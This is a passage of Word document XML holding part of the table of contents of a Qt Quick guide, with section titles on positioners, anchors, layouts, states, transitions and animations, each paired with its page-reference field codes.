          <w:t>259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15" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Positioners</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605515 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>260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16" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layouts</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605516 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>260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17" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Right-To-Left Support</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605517 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>260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18" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Positioning with Anchors</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605518 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>260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19" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Anchor Margins and Offsets</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605519 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>262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20" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Changing Anchors</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605520 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>263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21" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Restrictions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605521 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>265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22" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item Positioners</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605522 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>265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23" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Positioners</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605523 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>265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24" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Column</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605524 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>266</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25" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Row</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605525 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>267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26" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Grid</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605526 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>267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27" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Flow</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605527 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>268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28" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Other Ways to Position Items</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605528 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>269</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529" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Important Concepts in Qt Quick - States, Transitions and Animations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605529 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>269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30" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>States</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605530 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>269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31" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Transitions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605531 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>270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32" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605532 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>270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33" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animating Property Assignments</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605533 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>270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34" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animators</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605534 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>271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35" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animated Sprites</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605535 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>271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36" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
          </w:rPr>
          <w:t>Qt Quick State</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605536 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>271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37" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Creating States</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605537 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>272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38" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>The Default State</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605538 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>273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39" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>The </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>when</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t> Property</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605539 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>273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40" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animating State Changes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605540 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>274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41" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>State Fast Forwarding</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605541 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
